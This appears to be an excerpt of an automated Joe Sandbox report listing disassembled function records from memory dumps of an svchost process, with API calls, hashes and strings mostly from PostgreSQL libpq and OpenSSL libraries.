                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                            • String ID:
                                                                                            • API String ID: 3215553584-0
                                                                                            • Opcode ID: d8c9c720c423dd0fb7c7fdef2e919f46d25ae73476d54887143296ce2eb2440e
                                                                                            • Instruction ID: dc4474ebf858d31d3d2bc60a5f24b3735f66906328149ad919200e550ccc2de2
                                                                                            • Opcode Fuzzy Hash: d8c9c720c423dd0fb7c7fdef2e919f46d25ae73476d54887143296ce2eb2440e
                                                                                            • Instruction Fuzzy Hash: BAC1C162B0C68AD1E7709B94A4B42BE7791FB82B80F658131DA4D07393DF7CE845C781
                                                                                            APIs
                                                                                            Strings
                                                                                            • D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c, xrefs: 00007FFDA36F43DD
                                                                                            • (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D, xrefs: 00007FFDA36F43E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Last$CreateErrorFileStatus_wassert
                                                                                            • String ID: (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D$D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c
                                                                                            • API String ID: 4152205889-1407915
                                                                                            • Opcode ID: 13428a4a084adc298e55a553be0c416b07cc18ad2ad40da243f3966190fd6d86
                                                                                            • Instruction ID: 799ddef4fa6ee7ad8a701bb89003f1c538ca211c36d44faa79606e5bdfaff4aa
                                                                                            • Opcode Fuzzy Hash: 13428a4a084adc298e55a553be0c416b07cc18ad2ad40da243f3966190fd6d86
                                                                                            • Instruction Fuzzy Hash: F1415C23B0AA5546F7219B24E81236E3582F744774F485234DA6D937C2DF7ED8848748
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$CloseHandleLastStatus
                                                                                            • String ID:
                                                                                            • API String ID: 573794993-0
                                                                                            • Opcode ID: 01925ca212a3f11562ca6d029b4d52a2f766c3a2ff5ed6290fc74fb45a60b174
                                                                                            • Instruction ID: a50180a470f66c1993389f0c38a7cdf438b683fd7307f040856b524a2cf82b22
                                                                                            • Opcode Fuzzy Hash: 01925ca212a3f11562ca6d029b4d52a2f766c3a2ff5ed6290fc74fb45a60b174
                                                                                            • Instruction Fuzzy Hash: E9310761B0BA4286F7249B2598282792262BF54770F686330EA3D537D2DF3DE490875C
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E24
                                                                                              • Part of subcall function 00007FFDA36EC3B0: Sleep.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC3D2
                                                                                              • Part of subcall function 00007FFDA36EC3B0: InitializeCriticalSection.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC3F0
                                                                                              • Part of subcall function 00007FFDA36EC3B0: EnterCriticalSection.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC406
                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorInitializeLastSleepgetenv
                                                                                            • String ID: /share/locale$PGLOCALEDIR$libpq-16
                                                                                            • API String ID: 4109591470-900106006
                                                                                            • Opcode ID: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
                                                                                            • Instruction ID: f5e54a1aee03b490ee05ab7f209ae36d1f62311388d10a7f89a402f864c1f2cf
                                                                                            • Opcode Fuzzy Hash: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
                                                                                            • Instruction Fuzzy Hash: 34014B11F0B68381FA10AB14ACB127537A3BF59304F8C2075E04D663A7EE2EA5488348
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                                                                                            • API String ID: 0-551583306
                                                                                            • Opcode ID: 7d03435d41bbe7626240fee5d904c6f03834b88cc5d41ab480cb746a93afb826
                                                                                            • Instruction ID: 1c4626336a6198bcdcd7fc87f5cdd074f1fc2b22ce3d25b8ab25094a7860f35a
                                                                                            • Opcode Fuzzy Hash: 7d03435d41bbe7626240fee5d904c6f03834b88cc5d41ab480cb746a93afb826
                                                                                            • Instruction Fuzzy Hash: 74A1A062B0F38282FBA98B15946537937A2EB44B84F584035DE4D673D6DF3EE881C708
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: callocfree
                                                                                            • String ID:
                                                                                            • API String ID: 306872129-0
                                                                                            • Opcode ID: 440052d8aa252fc403e1b18fb0074ef3cf7239a02d1e66a828f150907f6617e9
                                                                                            • Instruction ID: 198bc946ccc57847e9b56378aec73cf82e7e7cba7e99519167f305163bc720a6
                                                                                            • Opcode Fuzzy Hash: 440052d8aa252fc403e1b18fb0074ef3cf7239a02d1e66a828f150907f6617e9
                                                                                            • Instruction Fuzzy Hash: 1A616C32206BC186E3518F34D4583DA36A1EB45B6CF180338DAA95F7DADFBA9044C765
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateEventcallocfree
                                                                                            • String ID: d
                                                                                            • API String ID: 1150888495-2564639436
                                                                                            • Opcode ID: 443729bc57561f6a795b4ea31471f5cae1b3903848d998f3ab6d23dae0dc128a
                                                                                            • Instruction ID: 544fbcc5a78cc1e9a5f51b6609e45e48a97417d4c930af4fde46ded70f9c8f0f
                                                                                            • Opcode Fuzzy Hash: 443729bc57561f6a795b4ea31471f5cae1b3903848d998f3ab6d23dae0dc128a
                                                                                            • Instruction Fuzzy Hash: 3C311A32B1AB4192EB05EB20D4712F972A2FF98B44F840035DA4D5679BEF3DE905C758
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessagestrchrwcstombs
                                                                                            • String ID: Unknown error
                                                                                            • API String ID: 4171340688-83687255
                                                                                            • Opcode ID: d63315eb628f02752e1d799c39d56083ab3544685e630d18f0dd8773cc4336b0
                                                                                            • Instruction ID: d1d6791dcea3766e08ffb9f2be9365d5b17455297a0b11c3f4798e78b670e314
                                                                                            • Opcode Fuzzy Hash: d63315eb628f02752e1d799c39d56083ab3544685e630d18f0dd8773cc4336b0
                                                                                            • Instruction Fuzzy Hash: 3921C222B0D7C196F7B18B28A86437A76D2AF89794F444230CB9D137C6EFBED4008718
                                                                                            APIs
                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FFD94748C55,?,00007FFD9471A8D5,?), ref: 00007FFD9473D106
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: 4989929f418510be00eaad4ba0abfe9a455c1d8ff00d167898f5db528b5556ad
                                                                                            • Instruction ID: 00dbbdb464e502b3363561044307d075cf63522a02a85e53cb7f906fac673533
                                                                                            • Opcode Fuzzy Hash: 4989929f418510be00eaad4ba0abfe9a455c1d8ff00d167898f5db528b5556ad
                                                                                            • Instruction Fuzzy Hash: 9C91F762B2865AC5FB70DBA5A4F02BD37A0BB46B88F248135DD0E57686CF3CD445C340
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA3633F40: ENGINE_finish.LIBCRYPTO-3-X64(?,00007FFDA361EE67,?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA3633F72
                                                                                            • ERR_set_mark.LIBCRYPTO-3-X64(?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA361EE6C
                                                                                            • OBJ_nid2sn.LIBCRYPTO-3-X64(?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA361EE73
                                                                                            • EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA361EE81
                                                                                            • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,00007FFDA360F901,?,?,?,?,?,00007FFDA3607023), ref: 00007FFDA361EE89
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: E_finishJ_nid2snR_fetchR_pop_to_markR_set_mark
                                                                                            • String ID:
                                                                                            • API String ID: 3538331334-0
                                                                                            • Opcode ID: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                                                                                            • Instruction ID: 1fce6e533522e7ce7785a34121d7cd3461e84b57540059be78eb489844ff5a33
                                                                                            • Opcode Fuzzy Hash: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                                                                                            • Instruction Fuzzy Hash: 40F0A011B0B34203F954A762656516D85929F8CBC4F0C64B8FE4D67B8BEE2EE8510308
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                                                                            • API String ID: 0-3791222319
                                                                                            • Opcode ID: e24ff53aba0dff93155571de1f8b73ad3d7d0d7574eac73b64d0d30358c8a112
                                                                                            • Instruction ID: af150c2db75bbcaa7aa5451893fc14f8eb642c0689aed1423c9c1a27d2728cb6
                                                                                            • Opcode Fuzzy Hash: e24ff53aba0dff93155571de1f8b73ad3d7d0d7574eac73b64d0d30358c8a112
                                                                                            • Instruction Fuzzy Hash: D541F722B0EA8382FA10DA265160279B692AF40BE5F144631DF6D573D7DE3FE4818705
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                            • String ID: x816796
                                                                                            • API String ID: 2371198981-64559503
                                                                                            • Opcode ID: ff84634ca94604e23106da7364d75e2a8d33db04dc11fb5fd61d0feea1d68e3b
                                                                                            • Instruction ID: 457ba3433980566019fe72333cbbbf70d19a8aaf47175c9a11d7073fe6dae1d0
                                                                                            • Opcode Fuzzy Hash: ff84634ca94604e23106da7364d75e2a8d33db04dc11fb5fd61d0feea1d68e3b
                                                                                            • Instruction Fuzzy Hash: B03191A2F0674181EA69DBA5D1A03A82290AF55BF4F248731DA7D437D6EEB8D4D2C340
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderPathmemset
                                                                                            • String ID: %s/postgresql
                                                                                            • API String ID: 2932979005-376571750
                                                                                            • Opcode ID: a8fce3c0427880ed849f8b9a4333abb74a1f45ffb7affd3f26d277be77a27f7c
                                                                                            • Instruction ID: 62f96abe3b392e60793fbcbc591a5ea19d711952cfa6685da60913822632a053
                                                                                            • Opcode Fuzzy Hash: a8fce3c0427880ed849f8b9a4333abb74a1f45ffb7affd3f26d277be77a27f7c
                                                                                            • Instruction Fuzzy Hash: 9E01883371AA8182FB609B61F4617EA6362EB897C4F886031D94D17B56CE3DD105CB04
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleepgetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 3033474312-0
                                                                                            • Opcode ID: cbea957c7a8fdcc0c36749ae218925b5f3caa1a0fc7cb6f7d3f347c8bc36a720
                                                                                            • Instruction ID: a2bfa54ee94346c4bed367a70b40ff7f5ab527d45fabeb008bee819690a1b18c
                                                                                            • Opcode Fuzzy Hash: cbea957c7a8fdcc0c36749ae218925b5f3caa1a0fc7cb6f7d3f347c8bc36a720
                                                                                            • Instruction Fuzzy Hash: 3901D436B1968297E7548F11E46427AB3A2EF48780F384134DA8C43B95CF3ED048DB04
                                                                                            APIs
                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA373A4D4), ref: 00007FFDA374656B
                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA373A4D4), ref: 00007FFDA3746591
                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA373A4D4), ref: 00007FFDA37465A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExclusiveLock$Release$Acquire
                                                                                            • String ID:
                                                                                            • API String ID: 1021914862-0
                                                                                            • Opcode ID: 487b4586fa51d13810dd78a9784ac8cd9bbedfc040dbe52416832f73b9c144de
                                                                                            • Instruction ID: 5894016ae6a9be5fb2b3b46539020f09a9133c0d22fe0e00ccbe4497c3c4aba6
                                                                                            • Opcode Fuzzy Hash: 487b4586fa51d13810dd78a9784ac8cd9bbedfc040dbe52416832f73b9c144de
                                                                                            • Instruction Fuzzy Hash: A2F0D610F5A443C2EA449F11DC7527572A3BF94705F800031D54F523A6DE2EF9498748
APIs
• _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDA36D6861
  • Part of subcall function 00007FFDA36DA920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36DA942
  • Part of subcall function 00007FFDA36DA920: strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDA36DA956
  • Part of subcall function 00007FFDA36DA920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36DA965
  • Part of subcall function 00007FFDA36DA920: isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA983
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: _errno$_time64isspacestrtol
• String ID: connect_timeout
• API String ID: 1465606051-1301815820
• Opcode ID: f9e2b2dd4110b161da813af918f7151e10ea1b4db753d8a941a0c659d0753ac6
• Instruction ID: 0b354272caea5353533e933a5349d1da31917d50dd0887d8b3db30150e560392
• Opcode Fuzzy Hash: f9e2b2dd4110b161da813af918f7151e10ea1b4db753d8a941a0c659d0753ac6
• Instruction Fuzzy Hash: 7B31E833F0A9418AFFA08E2594201B96292AF45BE4F9D1235DE5D273C6CE3EE8458754
APIs
• IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFD9472944E,?,?,?,00007FFD9472970A), ref: 00007FFD94735686
• _invalid_parameter_noinfo.LIBCMT ref: 00007FFD947356E9
Memory Dump Source
• Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
• Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
